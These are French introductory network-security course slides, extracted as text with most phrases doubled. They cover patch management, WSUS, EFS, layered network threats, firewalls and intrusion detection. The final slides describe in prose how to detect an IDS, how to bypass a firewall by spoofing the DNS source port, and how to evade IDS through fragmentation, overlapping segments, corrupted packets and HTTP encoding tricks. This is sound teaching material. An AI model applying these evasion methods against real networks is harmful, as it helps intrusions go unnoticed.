Scanner des machines ayant un pare-feu personnel Scanner des machines ayant un pare-feu personnel (ex : XP SP2 propose une exemption IPsec (ex : XP SP2 propose une exemption IPsec permettant de scanner n’importe quel port depuis une permettant de scanner n’importe quel port depuis une machine utilisant une authentification IPsec machine utilisant une authentification IPsec spécifique)spécifique)

Scanner des machines ayant un HIPS donne des Scanner des machines ayant un HIPS donne des résultats qui ne donnent pas l’état sous-jacent réel de résultats qui ne donnent pas l’état sous-jacent réel de la machine (si le HIDS avait une vulnérabilité par la machine (si le HIDS avait une vulnérabilité par exemple)exemple)

Page 226: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Gestion de la sécuritéGestion de la sécurité

ProtégerProtéger

DétecterDétecter

GérerGérer

Configuration adaptée, garde-fous en place.Configuration adaptée, garde-fous en place. Ex:  correctifs, permissions, ports, filtres de protocolesEx:  correctifs, permissions, ports, filtres de protocoles

Surveillance : violation de la politique de sécurité ou Surveillance : violation de la politique de sécurité ou comportement inattenducomportement inattendu

Ex: Échecs répétés d’authentification, violations d’accèsEx: Échecs répétés d’authentification, violations d’accès

DéfendreDéfendre Mettre en oeuvre les actions correctives sur les violations Mettre en oeuvre les actions correctives sur les violations

de sécuritéde sécurité Ex: Fermer des ports, désactiver des @ IP / des comptesEx: Fermer des ports, désactiver des @ IP / des comptes

RécupérerRécupérer Restauration de systèmes, applications, données dans Restauration de systèmes, applications, données dans

l’état précédant l’attaquel’état précédant l’attaque

Politique de protection, détection, défense et Politique de protection, détection, défense et restaurationrestauration

Ex: politique d’accès réseau VPN ou sans-filEx: politique d’accès réseau VPN ou sans-fil

Page 227: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Patch managementPatch managementLes logiciels, comme toute création humaine, Les logiciels, comme toute création humaine, comportent des erreurs, dont certaines touchent comportent des erreurs, dont certaines touchent à la sécurité (= vulnérabilités)à la sécurité (= vulnérabilités)L’ouverture des systèmes d’information vers L’ouverture des systèmes d’information vers Internet comporte de nombreux bénéfices mais Internet comporte de nombreux bénéfices mais s’accompagne aussi d’inconvénients, dont s’accompagne aussi d’inconvénients, dont certains sont liés à la sécuritécertains sont liés à la sécuritéLes vulnérabilités découvertes dans les Les vulnérabilités découvertes dans les technologies utilisées exposent l’entreprise à technologies utilisées exposent l’entreprise à des attaquesdes attaquesIl est indispensable de se doter d’un processus Il est indispensable de se doter d’un processus de gestion des mises à jour de sécurité (patch de gestion des mises à jour de sécurité (patch management)management)

Page 228: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Patch managementPatch managementLe cycle de vie d’une vulnérabilité comporte de Le cycle de vie d’une vulnérabilité comporte de nombreux événements (pas nécessairement dans l’ordre nombreux événements (pas nécessairement dans l’ordre ci-dessous) :ci-dessous) :

Le produit sort (et introduit des vulnérabilités inconnues)Le produit sort (et introduit des vulnérabilités inconnues) La vulnérabilité est découverteLa vulnérabilité est découverte La vulnérabilité est annoncée publiquementLa vulnérabilité est annoncée publiquement Le correctif est publiéLe correctif est publié L’exploitation est publiéeL’exploitation est publiée L’exploitation automatisée voit le jourL’exploitation automatisée voit le jour Le correctif est déployéLe correctif est déployé

On appelle On appelle zero day exploit zero day exploit une exploitation de une exploitation de vulnérabilité inconnuevulnérabilité inconnueDans le cadre de la divulgation responsable, les Dans le cadre de la divulgation responsable, les découvreurs sont invités à garder secrets leurs découvreurs sont invités à garder secrets leurs découvertes jusqu’à la publication d’un correctifdécouvertes jusqu’à la publication d’un correctif

Page 229: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Patch managementPatch managementSouvent, le correctif arrive avant l’exploitation, qui elle-Souvent, le correctif arrive avant l’exploitation, qui elle-même précède un ver ou une menace combinéemême précède un ver ou une menace combinéeLes vers et menaces combinées peuvent se déployer de Les vers et menaces combinées peuvent se déployer de manière foudroyantemanière foudroyante

Ex : SQL Slammer s’est déployé sur 90% des machines Ex : SQL Slammer s’est déployé sur 90% des machines vulnérables à l’échelle de l’Internet en 10 minutesvulnérables à l’échelle de l’Internet en 10 minutes

On ne peut donc pas attendre d’avoir la preuve de l’existence de On ne peut donc pas attendre d’avoir la preuve de l’existence de la menace concrète pour agirla menace concrète pour agir

Le temps entre la publication d’un correctifLe temps entre la publication d’un correctif Et l’exploitation varie entre 3 et 9 joursEt l’exploitation varie entre 3 et 9 jours Et le ver / menace combinée est maintenant d’environ 17 jours Et le ver / menace combinée est maintenant d’environ 17 jours

(Sasser)(Sasser) Le record pour Witty : 1 jour entre le correctif et le ver attaquant Le record pour Witty : 1 jour entre le correctif et le ver attaquant

un IDSun IDS

Page 230: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Windows Update Services (WSUS)Windows Update Services (WSUS)Exemple d’outil de gestion des mises à jour de Exemple d’outil de gestion des mises à jour de sécurité (patch management) sous Windows sécurité (patch management) sous Windows avec Windows Update Services (= SUS 2.0)avec Windows Update Services (= SUS 2.0)Basé sur le service de Mises à jour Basé sur le service de Mises à jour automatiques de Windows (XP, 2000, 2003)automatiques de Windows (XP, 2000, 2003) Inclus dans les dernières versionsInclus dans les dernières versions Installable via WSUS à condition d’avoir une ancienne Installable via WSUS à condition d’avoir une ancienne

versionversion

Configurable par stratégie de groupe pour Configurable par stratégie de groupe pour télécharger et/ou appliquer les mises à jourtélécharger et/ou appliquer les mises à jour

Page 231: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

L’administrateur souscrit à certaines catégories de mises à jourLe serveur télécharge les mises à jour depuis Microsoft UpdateLes clients s’enregistrent auprès du serveurL’administrateur met les clients dans différents groupes ciblesL’administrateur approuve les mises à jourLes clients installent les mises à jour approuvées par l’administrateur

< Back Finish Cancel

Windows Update ServicesWindows Update Services

< Back Finish Cancel

Windows Update ServicesWindows Update Services

Microsoft Update(utilise WSUS)

Serveur WSUS

Postes de travail (clients WSUS) Groupe cible 1

Serveurs (clients WSUS)Groupe cible 2

Administrateur WSUS

Aperçu de WSUSAperçu de WSUS

Page 232: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Système d’administration et de Système d’administration et de maintien de la sécuritémaintien de la sécurité

Mécanisme de pull utilisant le protocole BITS pour le Mécanisme de pull utilisant le protocole BITS pour le téléchargementtéléchargementConfiguration de Configuration de

L’intervalle de détectionL’intervalle de détection Redémarrage planifié ou nonRedémarrage planifié ou non ReplanificationReplanification

Approbation de mise à jourApprobation de mise à jour DétectionDétection InstallationInstallation Installation avec date butoirInstallation avec date butoir DésinstallationDésinstallation

RapportsRapportsScriptable si le mécanisme automatisé de base n’est pas Scriptable si le mécanisme automatisé de base n’est pas satisfaisantsatisfaisant

Page 233: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Chiffrement de fichiers EFSChiffrement de fichiers EFSPermet de lutter contre le vol de disque Permet de lutter contre le vol de disque dur (ou de machine)dur (ou de machine) PortablesPortables Serveurs critiquesServeurs critiques

Chiffre les fichiers lors de leur stockageChiffre les fichiers lors de leur stockageNe chiffre pas les fichiers lorsqu’ils Ne chiffre pas les fichiers lorsqu’ils transitent sur le réseautransitent sur le réseau

Page 234: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Chiffrement Chiffrement EFSEFSChiffrement des données

Chiffrement du fichier Clé de chiffrement

Textechiffré

Texteclair

Textechiffré

Clé de chiffrement de fichier

Clé publique de l'agentde récupération

Clépublique

de l'utilisateur

11

22

33

DDFDRF

Clé de chiffrement de fichier

Page 235: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Déchiffrement Déchiffrement EFSEFSDéchiffrement par l'utilisateur

Textechiffré

Texteclair

Clé privée de l'utilisateur

DDF

11 22

Textechiffré

Texteclair

Clé de chiffrement de fichier

Clé privée de l'agentde récupération

DRF

11 22

Déchiffrement par l'agentde récupération

Clé de chiffrement de fichier

Page 236: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 3Module 3Sécurité des réseauxSécurité des réseaux

3A - Rappels3A - Rappels

Page 237: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modèle de couches OSIModèle de couches OSIInterconnexion des Interconnexion des systèmes ouvertssystèmes ouvertsEncapsulation des Encapsulation des différentes différentes couches les unes couches les unes dans les autres dans les autres (du haut vers le (du haut vers le bas)bas)

Présentation

Application

Session

Transport

Réseau

Liaison

Physique

Page 238: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Menaces couches bassesMenaces couches bassesPhysiquePhysique

Écoute des émissions électromagnétiques des câblesÉcoute des émissions électromagnétiques des câbles Connexion directe au réseauConnexion directe au réseau Déni de serviceDéni de service

LiaisonLiaison Usurpation de paquets ARP et envoie de fausses adresses MACUsurpation de paquets ARP et envoie de fausses adresses MAC Écrasement d’entrées dans le cache ARPÉcrasement d’entrées dans le cache ARP Surcharge ou tromperie des commutateursSurcharge ou tromperie des commutateurs

RéseauRéseau Obtention d’une adresse IP via DHCPObtention d’une adresse IP via DHCP Usurpation d’adresse IPUsurpation d’adresse IP Écoute sur les routeursÉcoute sur les routeurs Déni de service visant un routeurDéni de service visant un routeur Usurpation du protocole de routage pour insérer de mauvaises Usurpation du protocole de routage pour insérer de mauvaises

routes dans les routeurs alentoursroutes dans les routeurs alentours Usurpation des messages de diagnostic ICMPUsurpation des messages de diagnostic ICMP

Page 239: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Menaces sur les équipements réseauMenaces sur les équipements réseauConcentrateurs, commutateurs, routeursConcentrateurs, commutateurs, routeurs Offrent des outils de gestion, souvent Offrent des outils de gestion, souvent

accessibles par le réseau, qui peuvent être accessibles par le réseau, qui peuvent être détournésdétournés

Tous exécutent des Tous exécutent des firmwaresfirmwares ou d’autres ou d’autres logiciels plus sophistiqués qui peuvent logiciels plus sophistiqués qui peuvent présenter des vulnérabilitésprésenter des vulnérabilités

Ils peuvent être bidouillés ou volés en cas Ils peuvent être bidouillés ou volés en cas d’accès physiqued’accès physique

Leurs configurations par défaut sont connues Leurs configurations par défaut sont connues des attaquantsdes attaquants

Page 240: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IPIPNiveau 3 (Réseau)Niveau 3 (Réseau)Transport des datagrammes de la source à la Transport des datagrammes de la source à la destination, sans garantie de succèsdestination, sans garantie de succèsDatagramme IPDatagramme IP En-tête (partie fixe de 20 octets + partie de longueur En-tête (partie fixe de 20 octets + partie de longueur

variable)variable)ChecksumChecksumTTL : durée de vie (cf rebond de paquet et TTL : durée de vie (cf rebond de paquet et traceroutetraceroute))ProtocolProtocol : ICMP (1), TCP (6), UDP (17), ESP (50), AH (51) : ICMP (1), TCP (6), UDP (17), ESP (50), AH (51)

Données (de longueur variable, à destination de la Données (de longueur variable, à destination de la couche supérieure)couche supérieure)

Supporte la fragmentationSupporte la fragmentationAucune notion de sécuritéAucune notion de sécurité

Page 241: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

TCPTCPNiveau 4 (Transport)Niveau 4 (Transport)Mode orienté connexionMode orienté connexionGère la segmentation (envoi séparé en plusieurs Gère la segmentation (envoi séparé en plusieurs datagrammes et ré-assemblage à l’arrivée)datagrammes et ré-assemblage à l’arrivée)Gère la retransmission de datagrammes perdus Gère la retransmission de datagrammes perdus (rappel : IP ne garantit pas l’acheminement)(rappel : IP ne garantit pas l’acheminement)Assure une assez bonne fiabilité au prix d’une Assure une assez bonne fiabilité au prix d’une surcharge réseausurcharge réseauÉtablissement de connexion : Établissement de connexion : handshake handshake (SYN, (SYN, SYN/ACK, ACK)SYN/ACK, ACK)Aucune notion de sécuritéAucune notion de sécurité

Page 242: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

UDPUDPNiveau 4 (Transport)Niveau 4 (Transport)Non orienté connexion (plus léger que Non orienté connexion (plus léger que TCP)TCP)Pour le Pour le streamingstreaming multimedia ou la VoIP multimedia ou la VoIP

Page 243: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ICMPICMPNiveau 3 (Réseau)Niveau 3 (Réseau)Contrôle (test de connexion à une Contrôle (test de connexion à une machine, destination impossible à machine, destination impossible à atteindre, manque de mémoire dans un atteindre, manque de mémoire dans un équipement réseau pour transmettre équipement réseau pour transmettre correctement le datagramme, etc.)correctement le datagramme, etc.)Contrairement à UDP et TCP, pas de port Contrairement à UDP et TCP, pas de port source ni de port de destinationsource ni de port de destinationCodes : Echo reply (0), Destination Codes : Echo reply (0), Destination unreachable (3), Echo request (8), Time unreachable (3), Echo request (8), Time exceeded (11), Traceroute (30)exceeded (11), Traceroute (30)

Page 244: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

PABXPABX

Des machines comme les autres, qui Des machines comme les autres, qui doivent être gérées par le service doivent être gérées par le service informatique et pas par les services informatique et pas par les services générauxgénérauxContiennent des vulnérabilités qui doivent Contiennent des vulnérabilités qui doivent être corrigéesêtre corrigéesVigilance accrue nécessaire avec l’arrivée Vigilance accrue nécessaire avec l’arrivée de VoIPde VoIPAttention à la configuration par défaut Attention à la configuration par défaut (dont les mots de passe)(dont les mots de passe)

Page 245: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Bonnes pratiquesBonnes pratiquesSégrégation des réseauxSégrégation des réseauxSécurité du périmètreSécurité du périmètreSécurité des différents nœuds et Sécurité des différents nœuds et périphériquespériphériquesProtection sur les couches 1,2,3,4Protection sur les couches 1,2,3,4

Page 246: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 3Module 3Sécurité des réseauxSécurité des réseaux

3B – Pare-feu3B – Pare-feu

Page 247: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Pare-feuPare-feuDispositif installé en coupure permettant Dispositif installé en coupure permettant de restreindre l’accès d’un réseau à un de restreindre l’accès d’un réseau à un autre par filtrageautre par filtragePour la connexion à Internet mais aussi en Pour la connexion à Internet mais aussi en interne, en particulier pour les réseaux interne, en particulier pour les réseaux sensiblessensiblesDe base filtre sur les services réseau, les De base filtre sur les services réseau, les adresses IP, …adresses IP, …Plus évolué : utilise l’authentificationPlus évolué : utilise l’authentificationLe filtrage se fait dans les 2 sensLe filtrage se fait dans les 2 sens

Page 248: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Filtrage de paquetsFiltrage de paquetsLe niveau le plus basique (première Le niveau le plus basique (première génération de génération de firewallfirewall))Basé sur les informations de la couche Basé sur les informations de la couche réseau (= couche n° 3)réseau (= couche n° 3)Exprimé sous la forme d’une liste Exprimé sous la forme d’une liste ordonnée de règlesordonnée de règles

Page 249: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Filtrage de paquetsFiltrage de paquetsLa dernière règle doit être de tout interdireLa dernière règle doit être de tout interdireAvantagesAvantages SimpleSimple Montée en chargeMontée en charge Bonnes performancesBonnes performances

InconvénientsInconvénients Inspecte l’entête seulementInspecte l’entête seulement Faible sécurité en comparaison des autres Faible sécurité en comparaison des autres

moyensmoyens

Autoriser TCP port 80 en sortieAutoriser TCP port 80 en sortie

Page 250: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SPI (SPI (Stateful Packet InspectionStateful Packet Inspection))Contrairement au simple filtrage de Contrairement au simple filtrage de paquets, garde un suivi les connexions paquets, garde un suivi les connexions (dans une table d’états)(dans une table d’états)Autorise certains flux réseau uniquement Autorise certains flux réseau uniquement si une connexion sortante correspondante si une connexion sortante correspondante existeexiste

Page 251: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Pare-feu applicatifsPare-feu applicatifsInspectent les paquets au plus profond Inspectent les paquets au plus profond (couche 7) en tenant compte de la (couche 7) en tenant compte de la sémantique de l’applicationsémantique de l’applicationEx: peuvent distinguer un GET d’un PUT Ex: peuvent distinguer un GET d’un PUT dans une requête HTTPdans une requête HTTPProblèmeProblème Performance amoindriePerformance amoindrie Nombre de filtres applicatifs disponiblesNombre de filtres applicatifs disponibles

Page 252: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Réflexions autour du pare-feuRéflexions autour du pare-feuNe pas accepter un paquet arrivant sur une Ne pas accepter un paquet arrivant sur une carte réseau externe dont l’adresse source carte réseau externe dont l’adresse source correspond au réseau internecorrespond au réseau interneNe laisse pas passer un paquet en provenance Ne laisse pas passer un paquet en provenance de l’interne s’il n’a pas d’adresse source de l’interne s’il n’a pas d’adresse source (machines zombies utilisées pour les dénis de (machines zombies utilisées pour les dénis de service répartis)service répartis)Il est intéressant de pouvoir assembler les Il est intéressant de pouvoir assembler les fragments avant de prendre une décision (mais fragments avant de prendre une décision (mais problème de temps de latence)problème de temps de latence)Ne pas accepter les paquets qui contiennent des Ne pas accepter les paquets qui contiennent des informations sur le routage (informations sur le routage (source routingsource routing))Un pare-feu n’est pas une mesure de sécurité Un pare-feu n’est pas une mesure de sécurité suffisante à lui seul (cf ligne Maginot)suffisante à lui seul (cf ligne Maginot)

Page 253: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Architectures type de pare-feu d’entrepriseArchitectures type de pare-feu d’entreprise

DMZ (DMZ (demilitarized zonedemilitarized zone) : réseau situé ) : réseau situé entre le réseau protégé (interne) et le entre le réseau protégé (interne) et le réseau non protégé (Internet)réseau non protégé (Internet) Contient les serveurs qui sont en première Contient les serveurs qui sont en première

ligne (messagerie, Web, DNS…)ligne (messagerie, Web, DNS…) Avec 1 ou 2 serveursAvec 1 ou 2 serveurs

NAT ou routageNAT ou routage

Page 254: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Pare-feuPare-feuDécouverte de machines par envoi d’une Découverte de machines par envoi d’une requête ACK à laquelle aucune ouverture requête ACK à laquelle aucune ouverture de session (SYN) ne correspondde session (SYN) ne correspondSolution : SPI - Solution : SPI - Statefull packet inspection Statefull packet inspection (inspection des paquets avec maintien des (inspection des paquets avec maintien des tables d’état)tables d’état) Nécessite plus de mémoire et de temps CPUNécessite plus de mémoire et de temps CPU Contournement : faire croire à un trafic Contournement : faire croire à un trafic

autorisé autorisé port source autorisé (par ex: 53 pour DNS)port source autorisé (par ex: 53 pour DNS)

Page 255: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les pare-feu personnelsLes pare-feu personnelsPermettent la défense en profondeurPermettent la défense en profondeurInclus dans les OS récentsInclus dans les OS récentsFiltrage entrant au minimumFiltrage entrant au minimumPour des pare-feu d’entreprise il est Pour des pare-feu d’entreprise il est conseillé d’utiliser des machines / conseillé d’utiliser des machines / équipements dédiés (bien que les pare-feu équipements dédiés (bien que les pare-feu logiciels puissent être installés sur des logiciels puissent être installés sur des machines offrant d’autres services), d’où machines offrant d’autres services), d’où la problématique du filtrage sortant sur les la problématique du filtrage sortant sur les pare-feu personnelspare-feu personnels

Page 256: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 3Module 3Sécurité des réseauxSécurité des réseaux

3C- Détection et prévention 3C- Détection et prévention d’intrusiond’intrusion

Page 257: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Systèmes de détection d’intrusion - IDSSystèmes de détection d’intrusion - IDSIDS (IDS (Intrusion Detection SystemIntrusion Detection System))Objectif : détecter les activités suspectes risquant de Objectif : détecter les activités suspectes risquant de compromettre des ressources à protégercompromettre des ressources à protégerHistorique (source : « Les IDS » de Thierry Evangelista)Historique (source : « Les IDS » de Thierry Evangelista)

Concept introduit en 1980 par Paul Anderson (HIDS)Concept introduit en 1980 par Paul Anderson (HIDS) Premières versions entre 1984 et 1994 (approche Premières versions entre 1984 et 1994 (approche

comportementale puis notion de signature)comportementale puis notion de signature)

A l’origine pour détecter les intrusions en provenance de A l’origine pour détecter les intrusions en provenance de l’Internet, mais souvent utile aussi en interne l’Internet, mais souvent utile aussi en interne L’étude du Clusif montre que le personnel représente la L’étude du Clusif montre que le personnel représente la plus grande menace pour l’entrepriseplus grande menace pour l’entreprise

Page 258: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IDS / IPSIDS / IPSIDS : logiciels et/ou matériels de détection IDS : logiciels et/ou matériels de détection et analyse de tentatives d’intrusion, et analyse de tentatives d’intrusion, volontaire ou non (entrée, maintien, volontaire ou non (entrée, maintien, modification d’un système)modification d’un système)IPS : logiciels et/ou matériels de blocage IPS : logiciels et/ou matériels de blocage d’activité suspecte détectéed’activité suspecte détectée

Page 259: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IDSIDSDeux grandes familles :Deux grandes familles : NIDS : sonde d’analyse passive des flux réseau ayant NIDS : sonde d’analyse passive des flux réseau ayant

pour but de détecter les intrusions en temps réelpour but de détecter les intrusions en temps réelPattern matchingPattern matchingAnalyse de protocoleAnalyse de protocoleDétection d’anomaliesDétection d’anomalies

HIDS : logiciel analysant en temps réel journaux et HIDS : logiciel analysant en temps réel journaux et flux de la machine localeflux de la machine locale

Signatures Signatures Analyse comportementale ou analyse statistique (détecte la Analyse comportementale ou analyse statistique (détecte la déviance par rapport au comportement normal). Peut déviance par rapport au comportement normal). Peut détecter de nouvelles attaques non répertoriées ; peut détecter de nouvelles attaques non répertoriées ; peut produire des faux positifsproduire des faux positifs

Page 260: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modules noyauxModules noyauxKIDS : HIDS noyau inspectant les appels KIDS : HIDS noyau inspectant les appels systèmesystèmeKIPS : HIDS noyau avec contrôle d’accès KIPS : HIDS noyau avec contrôle d’accès aux appels systèmeaux appels système

Page 261: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IDS : problèmes courantsIDS : problèmes courantsLes faux positifs : fausses alertesLes faux positifs : fausses alertesLes faux négatifs : intrusions non Les faux négatifs : intrusions non détectéesdétectéesLes NIDS analysent correctement en Les NIDS analysent correctement en dessous d’un certain seuil ; passé ce seuil, dessous d’un certain seuil ; passé ce seuil, des intrusions peuvent passer inaperçuesdes intrusions peuvent passer inaperçuesLes NIDS ne peuvent pas analyser le trafic Les NIDS ne peuvent pas analyser le trafic chiffréchiffréScanner de vulnérabilité et HIPS : Scanner de vulnérabilité et HIPS : mauvaise détectionmauvaise détection

Page 262: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Positionnement de sondesPositionnement de sondesOù les mettre ?Où les mettre ?

Internet

Messagerie

Routeur

Pare-feu

Pare-feu

Station Portable

Serveur appli sensible

DMZ

Routeur

Station

Page 263: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Détection IDSDétection IDSDétection de l’IDS par usurpation d’@ Détection de l’IDS par usurpation d’@ MACMAC ICMP echo requestICMP echo request avec MAC de avec MAC de

destination égale à zérodestination égale à zéro(si on reçoit la réponse, la carte réseau est (si on reçoit la réponse, la carte réseau est probablement en mode probablement en mode promiscuouspromiscuous))

OK sous Unix et Win9xOK sous Unix et Win9xNe marche pas sous NT+Ne marche pas sous NT+

Contre-mesure : 2 cartes réseau dont une Contre-mesure : 2 cartes réseau dont une seule a une adresse IP, l’autre servant à la seule a une adresse IP, l’autre servant à la détection furtivedétection furtive

Page 264: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Détection IDSDétection IDSMesure de temps de latenceMesure de temps de latence 2 séries de 2 séries de pingping (avec ou sans surcharge (avec ou sans surcharge

réseau avec trafic de diffusion)réseau avec trafic de diffusion)

Test des réponses actives (permet de Test des réponses actives (permet de discerner un IDS d’un autre)discerner un IDS d’un autre)Surveillance de requêtes DNSSurveillance de requêtes DNSRappel : « Tout mouvement nous Rappel : « Tout mouvement nous découvre » (Montaigne)découvre » (Montaigne)

Page 265: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Techniques d’évasion des IDSTechniques d’évasion des IDS2 grandes classes :2 grandes classes : Utilisation de la spécificité d’un protocole ou Utilisation de la spécificité d’un protocole ou

d’un comportement pour faire en sorte que d’un comportement pour faire en sorte que l’IDS ait une vue différente des ciblesl’IDS ait une vue différente des cibles

Comportement de pile TCP/IPComportement de pile TCP/IPAbsence de vérification d’intégrité ou complétude Absence de vérification d’intégrité ou complétude d’analyse par l’IDS (étalement temporel, longueur d’analyse par l’IDS (étalement temporel, longueur de requête)de requête)Normalisation de requête avant journalisationNormalisation de requête avant journalisation

Mutation d’une attaqueMutation d’une attaque

Page 266: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Techniques d’évasion des IDSTechniques d’évasion des IDSInjection de données supplémentaires pour que Injection de données supplémentaires pour que l’attaque ait l’air inoffensive du point de vue de l’attaque ait l’air inoffensive du point de vue de l’IDS; ces données supplémentaires ne sont pas l’IDS; ces données supplémentaires ne sont pas interprétées par la cible réelleinterprétées par la cible réelle Fragmentation IP utilisant l’écrasement (avec Fragmentation IP utilisant l’écrasement (avec

recouvrement, avec re-émission d’un fragment) ou recouvrement, avec re-émission d’un fragment) ou l’expiration côté IDS (fragment arrivant trop l’expiration côté IDS (fragment arrivant trop tardivement)tardivement)

Découpage de paquets TCP en plusieurs sessions se Découpage de paquets TCP en plusieurs sessions se recouvrant (assemblage des segments anciens vs recouvrant (assemblage des segments anciens vs nouveaux)nouveaux)

Injection de paquets corrompus (CRC erronée ou TTL Injection de paquets corrompus (CRC erronée ou TTL faible si la cible n’est pas sur le même segment que faible si la cible n’est pas sur le même segment que l’IDS)l’IDS)

Page 267: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Techniques d’évasion des IDSTechniques d’évasion des IDSHTTPHTTP Changement de méthode (Changement de méthode (headhead au lieu de au lieu de getget))

Encodage d’URL (%20 pour espace)Encodage d’URL (%20 pour espace) Répétitions de caractères non significatives Répétitions de caractères non significatives

